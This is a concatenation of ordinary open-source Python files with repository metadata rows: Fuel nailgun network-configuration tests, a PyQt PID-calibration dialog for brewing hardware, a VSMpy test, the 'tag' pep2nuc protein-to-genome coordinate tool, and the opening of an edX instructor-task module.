            "Change of 'segmentation_type' is prohibited"
        )

    def test_networks_update_fails_with_wrong_net_id(self):
        new_nets = {'networks': [{'id': 500,
                                  'name': 'new',
                                  'vlan_start': 500}]}

        resp = self.env.neutron_networks_put(self.cluster.id, new_nets,
                                             expect_errors=True)
        self.assertEqual(202, resp.status_code)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'error')
        self.assertEqual(
            task['message'],
            'Invalid network ID: 500'
        )

    def test_refresh_public_cidr_on_its_change(self):
        # Re-addressing the public network (cidr, gateway, ranges and
        # floating ranges together) must be accepted and persisted.
        data = jsonutils.loads(self.env.neutron_networks_get(
            self.cluster.id).body)
        publ = filter(lambda ng: ng['name'] == 'public', data['networks'])[0]
        self.assertEqual(publ['cidr'], '172.16.0.0/24')

        publ['cidr'] = '199.61.0.0/24'
        publ['gateway'] = '199.61.0.1'
        publ['ip_ranges'] = [['199.61.0.11', '199.61.0.33'],
                             ['199.61.0.55', '199.61.0.99']]
        data['networking_parameters']['floating_ranges'] = \
            [['199.61.0.111', '199.61.0.122']]

        resp = self.env.neutron_networks_put(self.cluster.id, data)
        self.assertEqual(202, resp.status_code)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'ready')

        self.db.refresh(self.cluster)
        publ_ng = filter(lambda ng: ng.name == 'public',
                         self.cluster.network_groups)[0]
        self.assertEqual(publ_ng.cidr, '199.61.0.0/24')

    def test_admin_public_untagged_others_tagged(self):
        resp = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(resp.body)
        for net in data['networks']:
            if net['name'] in ('fuelweb_admin', 'public',):
                self.assertIsNone(net['vlan_start'])
            else:
                self.assertIsNotNone(net['vlan_start'])

    def test_mgmt_storage_networks_have_no_gateway(self):
        resp = self.env.neutron_networks_get(self.cluster.id)
        self.assertEqual(200, resp.status_code)
        data = jsonutils.loads(resp.body)
        for net in data['networks']:
            if net['name'] in ['management', 'storage']:
                self.assertIsNone(net['gateway'])

    def test_management_network_has_gw(self):
        # Patch the default metadata so management uses a gateway, then
        # check the API exposes it while storage stays gateway-less.
        net_meta = self.env.get_default_networks_metadata().copy()
        mgmt = filter(lambda n: n['name'] == 'management',
                      net_meta['neutron']['networks'])[0]
        mgmt['use_gateway'] = True

        def get_new_networks_metadata():
            return net_meta

        self.env.get_default_networks_metadata = get_new_networks_metadata
        cluster = self.env.create(
            cluster_kwargs={'net_provider': 'neutron',
                            'net_segment_type': 'gre'},
            nodes_kwargs=[{"pending_addition": True}]
        )
        resp = self.env.neutron_networks_get(cluster['id'])
        data = jsonutils.loads(resp.body)
        mgmt = filter(lambda n: n['name'] == 'management',
                      data['networks'])[0]
        self.assertEqual(mgmt['gateway'], '192.168.0.1')
        strg = filter(lambda n: n['name'] == 'storage',
                      data['networks'])[0]
        self.assertIsNone(strg['gateway'])
class TestNovaNetworkConfigurationHandlerHA(BaseIntegrationTest):
    # VIP assignment checks specific to HA-mode nova-network clusters.

    def setUp(self):
        super(TestNovaNetworkConfigurationHandlerHA, self).setUp()
        cluster = self.env.create_cluster(api=True, mode='ha_compact')
        self.cluster = self.db.query(Cluster).get(cluster['id'])
        self.net_manager = NetworkManager

    def test_returns_management_vip_and_public_vip(self):
        # The GET payload must carry the same VIPs the network manager
        # assigns for the cluster.
        resp = jsonutils.loads(
            self.env.nova_networks_get(self.cluster.id).body)

        self.assertEqual(
            resp['management_vip'],
            self.net_manager.assign_vip(self.cluster.id, 'management'))

        self.assertEqual(
            resp['public_vip'],
            self.net_manager.assign_vip(self.cluster.id, 'public'))
class TestAdminNetworkConfiguration(BaseIntegrationTest):
    # The admin (PXE) network is patched to overlap with the default
    # management CIDR (192.168.0.0/24) so that the address-space
    # intersection checks below are guaranteed to fail.

    @patch('nailgun.db.sqlalchemy.fixman.settings.ADMIN_NETWORK', {
        "cidr": "192.168.0.0/24",
        "size": "256",
        "first": "192.168.0.129",
        "last": "192.168.0.254"
    })
    def setUp(self):
        super(TestAdminNetworkConfiguration, self).setUp()
        self.cluster = self.env.create(
            cluster_kwargs={
                "api": True
            },
            nodes_kwargs=[
                {"pending_addition": True, "api": True}
            ]
        )

    def test_netconfig_error_when_admin_cidr_match_other_network_cidr(self):
        # Verification (check_networks) must report the intersection.
        resp = self.env.nova_networks_get(self.cluster['id'])
        nets = jsonutils.loads(resp.body)

        resp = self.env.nova_networks_put(self.cluster['id'], nets,
                                          expect_errors=True)
        self.assertEqual(resp.status_code, 202)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'error')
        self.assertEqual(task['progress'], 100)
        self.assertEqual(task['name'], 'check_networks')
        self.assertIn("Address space intersection between networks:\n"
                      "admin (PXE), management.",
                      task['message'])

    def test_deploy_error_when_admin_cidr_match_other_network_cidr(self):
        # Deployment must fail with the same intersection error.
        resp = self.env.cluster_changes_put(self.cluster['id'],
                                            expect_errors=True)
        self.assertEqual(resp.status_code, 202)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'error')
        self.assertEqual(task['progress'], 100)
        self.assertEqual(task['name'], 'deploy')
        self.assertIn("Address space intersection between networks:\n"
                      "admin (PXE), management.",
                      task['message'])
| Axam/nsx-web | nailgun/nailgun/test/integration/test_network_configuration.py | Python | apache-2.0 | 20,114 |
import sys
import os
sys.path.insert(0, os.path.abspath(".."))
import time
from PyQt5 import QtCore, QtGui, QtWidgets, uic
import pyqtgraph
import threading
from multiprocessing import Pipe
import pickle
from automatedbrewery.HeatControl import HeatController
from automatedbrewery.RTDSensor import tempSensors
from automatedbrewery.PID import PID
# Load the Qt Designer layout for the calibration dialog; loadUiType returns
# the generated form class and the Qt base class it extends.
qtCreatorFile = "../UI/AutomatedBreweryUI/PIDCalibrationDialog.ui"
Ui_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)
class PIDCalibration(QtWidgets.QMainWindow, Ui_MainWindow):
    """Dialog that auto-tunes the HLT and BLK heater PID loops.

    Spins up background threads for temperature sensing, heat control and
    the two PID loops, wires them together with multiprocessing pipes, and
    graphs temperature and heater output while a calibration runs.  Tuned
    gains are pickled to disk when the user completes the calibration.
    """

    # Qt signals used to marshal sensor/controller updates onto the GUI thread.
    tempSignal = QtCore.pyqtSignal(list)
    heatGraphSignal = QtCore.pyqtSignal(float, float, str)
    messageSignal = QtCore.pyqtSignal(str, str)

    # Pipe pairs connecting the UI, the two PID loops and the heat controller.
    # NOTE(review): these are class attributes, created once at import time and
    # shared by all instances -- fine as long as only one PIDCalibration
    # window is ever opened; confirm before instantiating more than one.
    heatToHLTPIDPipe, HLTPIDToHeatPipe = Pipe()
    UIToHLTPIDPipe, HLTPIDToUIPipe = Pipe()
    heatToBLKPIDPipe, BLKPIDToHeatPipe = Pipe()
    UIToBLKPIDPipe, BLKPIDToUIPipe = Pipe()
    UIToHeatPipe, heatToUIPipe = Pipe()

    # Brushes used to colour entries in the message list.
    errorBrush = QtGui.QBrush(QtCore.Qt.SolidPattern)
    errorBrush.setColor(QtGui.QColor(203, 34, 91))
    successBrush = QtGui.QBrush(QtCore.Qt.SolidPattern)
    successBrush.setColor(QtGui.QColor(7, 155, 132))

    def __init__(self):
        super(PIDCalibration, self).__init__()

        # Import the old calibration, if there is a file available.
        if os.path.isfile('../calibrations/PIDCalibration.pk1'):
            with open('../calibrations/PIDCalibration.pk1', 'rb') as infile:
                self.HLTResults = pickle.load(infile)
                self.BLKResults = pickle.load(infile)
        else:
            self.HLTResults = []
            self.BLKResults = []

        # Global pyqtgraph settings: white background, black foreground.
        pyqtgraph.setConfigOption('background', 'w')
        pyqtgraph.setConfigOption('foreground', 'k')

        # Connect the signals to their GUI-thread handlers.
        self.tempSignal.connect(self.tempUpdate)
        self.heatGraphSignal.connect(self.updateHeatGraph)
        self.messageSignal.connect(self.newMessage)

        # Start up the UI.
        self.setupUi(self)
        self.Messages.clear()
        self.show()

        # Flags shared with the worker threads.
        self.turnOffTempSensing = False
        self.currentlyCalibrating = False
        self.stopCalibration = False

        # Threads for each of the sensors and controllers.
        self.HLTPIDThread = threading.Thread(name='HLTPIDThread',
                                             target=self.startHLTPID)
        self.BLKPIDThread = threading.Thread(name='BLKPIDThread',
                                             target=self.startBLKPID)
        self.heatThread = threading.Thread(name='heatThread',
                                           target=self.startHeatControl)
        self.tempThread = threading.Thread(name='tempThread',
                                           target=self.startTempSensing)
        self.resultListenerThread = threading.Thread(
            name='resultListenerThread',
            target=self.listenForCalibrationResults)

        # Connect the buttons.
        self.Calibrate_HLT.clicked.connect(lambda: self.startCalibration("HLT"))
        self.Calibrate_BLK.clicked.connect(lambda: self.startCalibration("BLK"))
        self.Complete_Calibration.clicked.connect(self.completeCalibration)

        # Default the kettle setting to none.
        self.kettleSetting = "None"

        # Initial graph series (HLT/MLT/BLK temperature, HLT/BLK heat) and pens.
        self.tempx = [[], [], []]
        self.tempy = [[], [], []]
        self.heatx = [[], []]
        self.heaty = [[], []]
        self.HLTPen = pyqtgraph.mkPen(color=(157, 224, 234), width=3)
        self.MLTPen = pyqtgraph.mkPen(color=(0, 138, 179), width=3)
        self.BLKPen = pyqtgraph.mkPen(color=(0, 44, 119), width=3)
        self.startTime = time.time()

        # Start the worker threads.
        self.tempThread.start()
        self.heatThread.start()
        self.HLTPIDThread.start()
        self.BLKPIDThread.start()
        self.resultListenerThread.start()

    def _configureAndRunPID(self, pid, outputPipe, inputPipe):
        """Apply the common PID configuration and run the loop (blocks)."""
        pid.outputPipeConn = outputPipe
        pid.inputPipeConn = inputPipe
        pid.messageSignal = self.messageSignal
        pid.outputMin = 0
        pid.outputMax = 100
        pid.cycleTime = 2000
        pid.outputAttributeName = "heatSetting"
        pid.mode = "Off"
        pid.run()

    def startHLTPID(self):
        """Thread target: run the hot-liquor-tank PID loop."""
        time.sleep(1)  # give the other components time to come up
        self.HLTPID = PID(self, "HLTTemp")
        self._configureAndRunPID(self.HLTPID,
                                 self.HLTPIDToHeatPipe, self.HLTPIDToUIPipe)

    def startBLKPID(self):
        """Thread target: run the boil-kettle PID loop."""
        time.sleep(1)  # give the other components time to come up
        self.BLKPID = PID(self, "BLKTemp")
        self._configureAndRunPID(self.BLKPID,
                                 self.BLKPIDToHeatPipe, self.BLKPIDToUIPipe)

    def startHeatControl(self):
        """Thread target: run the heat controller, wired to both PID pipes."""
        heatCtrl = HeatController(pipeConn=self.heatToHLTPIDPipe,
                                  pipeConn2=self.heatToBLKPIDPipe,
                                  pipeConn3=self.heatToUIPipe,
                                  heatGraphSignal=self.heatGraphSignal)
        heatCtrl.run()

    def startTempSensing(self):
        """Thread target: poll the RTD sensors and emit readings at ~10 Hz."""
        self.tempSensor = tempSensors()
        while not self.turnOffTempSensing:
            readings = [self.tempSensor.HLTTemp(),
                        self.tempSensor.MLTTemp(),
                        self.tempSensor.BLKTemp()]
            self.tempSignal.emit(readings)
            time.sleep(.1)

    def tempUpdate(self, tempValues):
        """Slot: record the latest kettle temperatures and redraw the graph."""
        # Keep the raw (unclamped) readings on the instance for other users.
        self.HLTTemp, self.MLTTemp, self.BLKTemp = tempValues

        currTime = (time.time() - self.startTime) / 60
        for i, reading in enumerate(tempValues):
            # Clamp into [0, 999]; after clamping, 0 and 999 act as sentinels
            # for invalid/out-of-range readings and are not plotted.
            reading = min(max(reading, 0), 999)
            if reading != 999 and reading != 0:
                self.tempy[i].append(reading)
                self.tempx[i].append(currTime)

        self.Temp_Graph.clear()
        self.Temp_Graph.plot(self.tempx[0], self.tempy[0], pen=self.HLTPen)
        self.Temp_Graph.plot(self.tempx[1], self.tempy[1], pen=self.MLTPen)
        self.Temp_Graph.plot(self.tempx[2], self.tempy[2], pen=self.BLKPen)

    def updateHeatGraph(self, timestamp, heatSetting, kettle):
        """Slot: append the latest heater output for *kettle* and redraw.

        The parameter was renamed from ``time`` because it shadowed the
        ``time`` module.  It appears to be in milliseconds (it is divided by
        1000 before comparison with the epoch-seconds ``startTime``) --
        confirm against HeatController.
        """
        currTime = (timestamp / 1000 - self.startTime) / 60
        # Exactly one kettle can be heating; the other series gets a zero so
        # both curves stay aligned on the time axis.
        if kettle == "HLT":
            hltSetting, blkSetting = heatSetting, 0
        elif kettle == "BLK":
            hltSetting, blkSetting = 0, heatSetting
        else:
            hltSetting, blkSetting = 0, 0
        self.heaty[0].append(hltSetting)
        self.heatx[0].append(currTime)
        self.heaty[1].append(blkSetting)
        self.heatx[1].append(currTime)

        self.Power_Graph.clear()
        self.Power_Graph.plot(self.heatx[0], self.heaty[0], pen=self.HLTPen)
        self.Power_Graph.plot(self.heatx[1], self.heaty[1], pen=self.BLKPen)

    def printAndSendMessage(self, message, messageType):
        """Echo *message* to stdout and append it to the on-screen log."""
        print(message)
        self.newMessage(message, messageType)

    def newMessage(self, message, messageType):
        """Slot: append *message* to the message list, coloured by type."""
        newmessage = QtWidgets.QListWidgetItem(self.Messages)
        newmessage.setText(message)
        if messageType == "Alarm":
            newmessage.setBackground(self.errorBrush)
        elif messageType == "Warning":
            newmessage.setForeground(self.errorBrush)
        elif messageType == "Success":
            newmessage.setForeground(self.successBrush)
        self.Messages.scrollToBottom()

    def startCalibration(self, kettle):
        """Kick off PID auto-tuning for the given kettle ("HLT" or "BLK")."""
        if kettle not in ("HLT", "BLK"):
            return
        if self.currentlyCalibrating:
            self.printAndSendMessage("Error: Currently calibrating a PID",
                                     "Alarm")
            return

        # Read the auto-tune parameters from the UI fields (seconds -> ms
        # for the steady-requirement and look-back times).
        autoTuneParameters = [
            float(self.Output_Start_Value.text()),
            float(self.Output_Change.text()),
            float(self.Expected_Noise_Amplitude.text()),
            float(self.Steady_Requirement.text()) * 1000,
            float(self.Temp_Change_Requirement.text()),
            float(self.Lookback_Time.text()) * 1000,
            float(self.Accuracy_Requirement.text()),
        ]

        self.currentlyCalibrating = True
        self.kettleSetting = kettle
        # Silence the other PID, start auto-tune on the chosen one, and
        # route the heat controller to the chosen kettle.
        if kettle == "HLT":
            self.UIToBLKPIDPipe.send(("mode", "Off"))
            self.UIToHLTPIDPipe.send(("autoTune", autoTuneParameters))
        else:
            self.UIToHLTPIDPipe.send(("mode", "Off"))
            self.UIToBLKPIDPipe.send(("autoTune", autoTuneParameters))
        self.UIToHeatPipe.send(("kettle", kettle))

    def listenForCalibrationResults(self):
        """Thread target: poll the PID pipes for finished auto-tune results."""
        while not self.stopCalibration:
            if self.UIToHLTPIDPipe.poll():
                self.HLTResults = self.UIToHLTPIDPipe.recv()
                self.currentlyCalibrating = False
            if self.UIToBLKPIDPipe.poll():
                self.BLKResults = self.UIToBLKPIDPipe.recv()
                self.currentlyCalibrating = False
            time.sleep(2)

    def completeCalibration(self):
        """Report the tuned gains, persist them, and close the dialog."""
        # "Success" (capitalised) is what newMessage matches for the success
        # brush; the original passed "success", which was never matched.
        self.printAndSendMessage("New calibrations:", "Success")
        if self.HLTResults != []:
            self.printAndSendMessage(
                "HLT: Kp={:.2f}, Ki={:.2f}, Kd={:.2f}".format(
                    self.HLTResults[0], self.HLTResults[1],
                    self.HLTResults[2]),
                "Success")
        if self.BLKResults != []:
            self.printAndSendMessage(
                "BLK: Kp={:.2f}, Ki={:.2f}, Kd={:.2f}".format(
                    self.BLKResults[0], self.BLKResults[1],
                    self.BLKResults[2]),
                "Success")
        # Save alongside the file read at start-up; the original wrote to the
        # current working directory, so __init__ never found the saved file.
        with open('../calibrations/PIDCalibration.pk1', 'wb') as output:
            pickle.dump(self.HLTResults, output,
                        protocol=pickle.HIGHEST_PROTOCOL)
            pickle.dump(self.BLKResults, output,
                        protocol=pickle.HIGHEST_PROTOCOL)
        self.close()

    def closeEvent(self, *args, **kwargs):
        """Shut down heaters, PIDs and worker threads before closing."""
        self.UIToHLTPIDPipe.send(("mode", "Off"))
        self.UIToHLTPIDPipe.send(("stop", True))
        self.UIToBLKPIDPipe.send(("mode", "Off"))
        self.UIToBLKPIDPipe.send(("stop", True))
        self.UIToHeatPipe.send(("kettle", "None"))
        self.UIToHeatPipe.send(("heatSetting", 0))
        self.UIToHeatPipe.send(("turnOff", True))
        self.turnOffTempSensing = True
        self.stopCalibration = True
        # Bug fix: the original referenced the bound method without calling
        # it, so the Qt base-class close handler never ran.
        super(PIDCalibration, self).closeEvent(*args, **kwargs)
# Launch the calibration dialog as a standalone Qt application when this
# file is run directly.
if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)
    window = PIDCalibration()
    sys.exit(app.exec_())
| Bobstin/AutomatedBrewery | calibrations/PIDCalibration.py | Python | mit | 12,559 |
#!/usr/bin/python
#
# File : runtests.py
# Created : 14-Jul-2011
# By : atrilla
#
# Testing script
#
# Copyright (c) 2011 Alexandre Trilla
#
# This file is part of VSMpy.
#
# You should have received a copy of the rights granted with this
# distribution of VSMpy. See LICENCE.
#
import vsmpy.vsm
class Test():
    """Smoke tests for the VSMpy vector space model."""

    def testVSM(self):
        """Train a two-class VSM and check cosine ranks the football class
        higher for a football-related query."""
        theVSM = vsmpy.vsm.VectorSpaceModel()
        theVSM.input(theVSM.parse("I love playing football ."), "C1")
        theVSM.input(theVSM.parse("I like playing tennis ."), "C2")
        theVSM.train()
        # NOTE(review): the two query strings differ (only the first has a
        # trailing " ?"); presumably both were meant to be identical --
        # confirm before changing.
        football_score = theVSM.cosine(
            theVSM.parse("Do you enjoy playing football ?"), "C1")
        tennis_score = theVSM.cosine(
            theVSM.parse("Do you enjoy playing football"), "C2")
        # Fix: drop the "(...) == True" anti-pattern; compare directly.
        if football_score > tennis_score:
            print("VSM ...\t OK")
        else:
            print("VSM ...\t FAILED!!!")
# Conditional runs the tests only when this file is invoked as a script
# (allows importing the module without triggering a run).
if __name__ == '__main__':
    test = Test()
    test.testVSM()
| atrilla/vsmpy | test/runtests.py | Python | mit | 926 |
#!/usr/bin/env python
#
# -----------------------------------------------------------------------------
# Copyright (C) 2020 Daniel Standage <daniel.standage@gmail.com>
#
# This file is part of tag (http://github.com/standage/tag) and is licensed
# under the BSD 3-clause license: see LICENSE.
# -----------------------------------------------------------------------------
import argparse
import sys
import tag
def pep2nuc(genomestream, protstream, attr='ID', keepattr=None):
    """Translate protein-space features onto genomic coordinates.

    Builds a named index of the genome-level features (keyed on *attr*),
    then rewrites each protein-space feature so that its seqid and
    coordinates refer to the genome.  Features whose seqid has no entry in
    the index are reported on stderr and dropped.  When *keepattr* is set,
    the original protein identifier is stored under that attribute.
    Yields the rewritten features.
    """
    genome_index = tag.index.NamedIndex()
    genome_index.consume(tag.GFF3Reader(genomestream), attribute=attr)
    for feature in tag.select.features(tag.GFF3Reader(protstream)):
        if feature.seqid not in genome_index:
            print(
                '[tag::pep2nuc] WARNING:',
                'protein identifier "{}" not defined'.format(feature.seqid),
                file=sys.stderr
            )
            continue
        parent = genome_index[feature.seqid]
        # 3 nucleotides per amino acid; offsets are relative to the parent's
        # genomic start coordinate.
        nuc_start = parent.start + (feature.start * 3)
        nuc_end = parent.start + (feature.end * 3)
        protid = feature.seqid
        feature.seqid = parent.seqid
        feature.set_coord(nuc_start, nuc_end)
        if keepattr:
            feature.add_attribute(keepattr, protid)
        yield feature
def subparser(subparsers):
    """Register the `pep2nuc` subcommand and its CLI options on *subparsers*."""
    # Note: the local name intentionally mirrors the function name; it is
    # only the argparse parser object for this subcommand.
    subparser = subparsers.add_parser('pep2nuc')
    subparser.add_argument(
        '-o', '--out', metavar='FILE', default='-', help='file to which '
        'output will be written; by default, output is written to the '
        'terminal (stdout)'
    )
    subparser.add_argument(
        '-a', '--attr', metavar='ATTR', default='ID', help='CDS/protein '
        'attribute in the genome GFF3 file that corresponds to the protein '
        'identifier (column 1) of the protein GFF3 file; "ID" by default'
    )
    subparser.add_argument(
        '-k', '--keep-prot', metavar='ATTR', help='keep the original protein '
        'ID and write it to the specified attribute in the output'
    )
    # Positional arguments: genome-space GFF3 first, protein-space GFF3 second.
    subparser.add_argument(
        'genome', help='GFF3 file with CDS or protein features defined on a '
        'genomic (contig, scaffold, or chromosome) coordinate system'
    )
    subparser.add_argument(
        'protein', help='GFF3 file with features defined on a protein '
        'coordinate system'
    )
def main(args):
    """Drive pep2nuc from parsed CLI arguments and write the GFF3 output."""
    with tag.open(args.genome, 'r') as genomestream, \
            tag.open(args.protein, 'r') as protstream:
        # pep2nuc yields features rewritten onto genomic coordinates.
        features = pep2nuc(
            genomestream, protstream,
            attr=args.attr, keepattr=args.keep_prot
        )
        writer = tag.GFF3Writer(features, outfile=args.out)
        writer.retainids = True
        writer.write()
| standage/tag | tag/cli/pep2nuc.py | Python | bsd-3-clause | 2,702 |
"""
This file contains tasks that are designed to perform background operations on the
running state of a course.
"""
import json
from collections import OrderedDict
from datetime import datetime
from django.conf import settings
from eventtracking import tracker
from itertools import chain
from time import time
import unicodecsv
import logging
from django.db import connection
from django.db.utils import DatabaseError
from celery import Task, current_task
from celery.states import SUCCESS, FAILURE
from django.contrib.auth.models import User
from django.core.files.storage import DefaultStorage
from django.db import transaction, reset_queries
from django.db.models import Q
import dogstats_wrapper as dog_stats_api
from pytz import UTC
import MySQLdb
from StringIO import StringIO
from edxmako.shortcuts import render_to_string
from instructor.paidcourse_enrollment_report import PaidCourseEnrollmentReportProvider
from shoppingcart.models import (
PaidCourseRegistration, CourseRegCodeItem, InvoiceTransaction,
Invoice, CouponRedemption, RegistrationCodeRedemption, CourseRegistrationCode
)
from track.views import task_track
from util.file import course_filename_prefix_generator, UniversalNewlineIterator
from xmodule.modulestore.django import modulestore
from xmodule.split_test_module import get_split_user_partitions
from django.utils.translation import ugettext as _
from certificates.models import (
CertificateWhitelist,
certificate_info_for_user,
CertificateStatuses
)
from certificates.api import generate_user_certificates
from courseware.courses import get_course_by_id, get_problems_in_section
from courseware.grades import iterate_grades_for
from courseware.models import StudentModule
from courseware.model_data import FieldDataCache
from courseware.module_render import get_module_for_descriptor_internal
from instructor_analytics.basic import enrolled_students_features, list_may_enroll
from instructor_analytics.csvs import format_dictlist
from instructor_task.models import ReportStore, InstructorTask, PROGRESS
from lms.djangoapps.lms_xblock.runtime import LmsPartitionService
from openedx.core.djangoapps.course_groups.cohorts import get_cohort
from openedx.core.djangoapps.course_groups.models import CourseUserGroup
from openedx.core.djangoapps.content.course_structures.models import CourseStructure
from opaque_keys.edx.keys import UsageKey
from openedx.core.djangoapps.course_groups.cohorts import add_user_to_cohort, is_course_cohorted
from student.models import CourseEnrollment, CourseAccessRole
from verify_student.models import SoftwareSecurePhotoVerification
from util.query import use_read_replica_if_available
from cm_plugin.models import CmGradebook, CmGradebookRecords
# define different loggers for use within tasks and on client side
TASK_LOG = logging.getLogger('edx.celery.task')

# define value to use when no task_id is provided:
UNKNOWN_TASK_ID = 'unknown-task_id'
# Roles excluded from some report output (exact use not visible in this
# section -- presumably filtered out of enrollment listings; confirm at
# the usage sites).
FILTERED_OUT_ROLES = ['staff', 'instructor', 'finance_admin', 'sales_admin']
# define values for update functions to use to return status to perform_module_state_update
UPDATE_STATUS_SUCCEEDED = 'succeeded'
UPDATE_STATUS_FAILED = 'failed'
UPDATE_STATUS_SKIPPED = 'skipped'

# The setting name used for events when "settings" (account settings, preferences, profile information) change.
REPORT_REQUESTED_EVENT_NAME = u'edx.instructor.report.requested'
class BaseInstructorTask(Task):
    """
    Base task class for use with InstructorTask models.

    Permits updating information about task in corresponding InstructorTask for monitoring purposes.

    Assumes that the entry_id of the InstructorTask model is the first argument to the task.

    The `entry_id` is the primary key for the InstructorTask entry representing the task.  This class
    updates the entry on success and failure of the task it wraps.  It is setting the entry's value
    for task_state based on what Celery would set it to once the task returns to Celery:
    FAILURE if an exception is encountered, and SUCCESS if it returns normally.
    Other arguments are pass-throughs to perform_module_state_update, and documented there.
    """
    # Celery: mark this class as a base class, not a registered task itself.
    abstract = True

    def on_success(self, task_progress, task_id, args, kwargs):
        """
        Update InstructorTask object corresponding to this task with info about success.

        Updates task_output and task_state.  But it shouldn't actually do anything
        if the task is only creating subtasks to actually do the work.

        Assumes `task_progress` is a dict containing the task's result, with the following keys:

          'attempted': number of attempts made
          'succeeded': number of attempts that "succeeded"
          'skipped': number of attempts that "skipped"
          'failed': number of attempts that "failed"
          'total': number of possible subtasks to attempt
          'action_name': user-visible verb to use in status messages.  Should be past-tense.
              Pass-through of input `action_name`.
          'duration_ms': how long the task has (or had) been running.

        This is JSON-serialized and stored in the task_output column of the InstructorTask entry.
        """
        TASK_LOG.debug('Task %s: success returned with progress: %s', task_id, task_progress)
        # We should be able to find the InstructorTask object to update
        # based on the task_id here, without having to dig into the
        # original args to the task.  On the other hand, the entry_id
        # is the first value passed to all such args, so we'll use that.
        # And we assume that it exists, else we would already have had a failure.
        entry_id = args[0]
        entry = InstructorTask.objects.get(pk=entry_id)
        # Check to see if any subtasks had been defined as part of this task.
        # If not, then we know that we're done.  (If so, let the subtasks
        # handle updating task_state themselves.)
        if len(entry.subtasks) == 0:
            entry.task_output = InstructorTask.create_output_for_success(task_progress)
            entry.task_state = SUCCESS
            entry.save_now()

    def on_failure(self, exc, task_id, args, kwargs, einfo):
        """
        Update InstructorTask object corresponding to this task with info about failure.

        Fetches and updates exception and traceback information on failure.

        If an exception is raised internal to the task, it is caught by celery and provided here.
        The information is recorded in the InstructorTask object as a JSON-serialized dict
        stored in the task_output column.  It contains the following keys:

               'exception':  type of exception object
               'message': error message from exception object
               'traceback': traceback information (truncated if necessary)

        Note that there is no way to record progress made within the task (e.g. attempted,
        succeeded, etc.) when such failures occur.
        """
        TASK_LOG.debug(u'Task %s: failure returned', task_id)
        entry_id = args[0]
        try:
            entry = InstructorTask.objects.get(pk=entry_id)
        except InstructorTask.DoesNotExist:
            # if the InstructorTask object does not exist, then there's no point
            # trying to update it.
            TASK_LOG.error(u"Task (%s) has no InstructorTask object for id %s", task_id, entry_id)
        else:
            TASK_LOG.warning(u"Task (%s) failed", task_id, exc_info=True)
            entry.task_output = InstructorTask.create_output_for_failure(einfo.exception, einfo.traceback)
            entry.task_state = FAILURE
            entry.save_now()
class UpdateProblemModuleStateError(Exception):
    """
    Error signaling a fatal condition while updating problem modules.

    Used when the current module cannot be processed and no more
    modules should be attempted.
    """
    # No additional behavior; the distinct type is the whole point.
    pass
def _get_current_task():
    """
    Stub to make it easier to test without actually running Celery.

    This is a wrapper around celery.current_task, which provides access
    to the top of the stack of Celery's tasks.  When running tests, however,
    it doesn't seem to work to mock current_task directly, so this wrapper
    is used to provide a hook to mock in tests, while providing the real
    `current_task` in production.
    """
    # Simply forward to Celery's thread-local current task proxy.
    return current_task
class TaskProgress(object):
    """
    Track a task's progress counters -- 'attempted', 'succeeded', 'skipped',
    'failed', 'total', 'action_name', 'duration_ms' -- and push them into
    the running celery task's state.
    """

    def __init__(self, action_name, total, start_time):
        self.action_name = action_name
        self.total = total
        self.start_time = start_time
        # All per-module counters begin at zero.
        self.attempted = self.succeeded = self.skipped = self.failed = 0

    def update_task_state(self, extra_meta=None):
        """
        Push the current progress into the running celery task's state
        (state=PROGRESS) and return the progress dict, for use by
        `run_main_task` and `BaseInstructorTask.on_success`.

        Arguments:
            extra_meta (dict): Extra metadata merged into the progress dict

        Returns:
            dict: The current task's progress dict
        """
        progress_dict = dict(
            action_name=self.action_name,
            attempted=self.attempted,
            succeeded=self.succeeded,
            skipped=self.skipped,
            failed=self.failed,
            total=self.total,
            duration_ms=int((time() - self.start_time) * 1000),
        )
        if extra_meta is not None:
            progress_dict.update(extra_meta)
        _get_current_task().update_state(state=PROGRESS, meta=progress_dict)
        return progress_dict
def run_main_task(entry_id, task_fcn, action_name):
    """
    Applies the `task_fcn` to the arguments defined in `entry_id` InstructorTask.

    Arguments passed to `task_fcn` are:

     `entry_id` : the primary key for the InstructorTask entry representing the task.
     `course_id` : the id for the course.
     `task_input` : dict containing task-specific arguments, JSON-decoded from InstructorTask's task_input.
     `action_name` : past-tense verb to use for constructing status messages.

    If no exceptions are raised, the `task_fcn` should return a dict containing
    the task's result with the following keys:

          'attempted': number of attempts made
          'succeeded': number of attempts that "succeeded"
          'skipped': number of attempts that "skipped"
          'failed': number of attempts that "failed"
          'total': number of possible subtasks to attempt
          'action_name': user-visible verb to use in status messages.
              Should be past-tense.  Pass-through of input `action_name`.
          'duration_ms': how long the task has (or had) been running.
    """
    # Get the InstructorTask to be updated. If this fails then let the exception return to Celery.
    # There's no point in catching it here.
    entry = InstructorTask.objects.get(pk=entry_id)
    entry.task_state = PROGRESS
    entry.save_now()

    # Get inputs to use in this task from the entry
    task_id = entry.task_id
    course_id = entry.course_id
    task_input = json.loads(entry.task_input)

    # Construct log message
    fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
    task_info_string = fmt.format(task_id=task_id, entry_id=entry_id, course_id=course_id, task_input=task_input)
    TASK_LOG.info(u'%s, Starting update (nothing %s yet)', task_info_string, action_name)

    # Check that the task_id submitted in the InstructorTask matches the current task
    # that is running.
    request_task_id = _get_current_task().request.id
    if task_id != request_task_id:
        fmt = u'{task_info}, Requested task did not match actual task "{actual_id}"'
        message = fmt.format(task_info=task_info_string, actual_id=request_task_id)
        TASK_LOG.error(message)
        raise ValueError(message)

    # Now do the work, timed under a per-action datadog metric.
    with dog_stats_api.timer('instructor_tasks.time.overall', tags=[u'action:{name}'.format(name=action_name)]):
        task_progress = task_fcn(entry_id, course_id, task_input, action_name)

    # Release any queries that the connection has been hanging onto
    reset_queries()

    # Log and exit, returning task_progress info as task result
    TASK_LOG.info(u'%s, Task type: %s, Finishing task: %s', task_info_string, action_name, task_progress)
    return task_progress
def perform_module_state_update(update_fcn, filter_fcn, _entry_id, course_id, task_input, action_name):
    """
    Performs generic update by visiting StudentModule instances with the update_fcn provided.

    StudentModule instances are those that match the specified `course_id` and `module_state_key`.
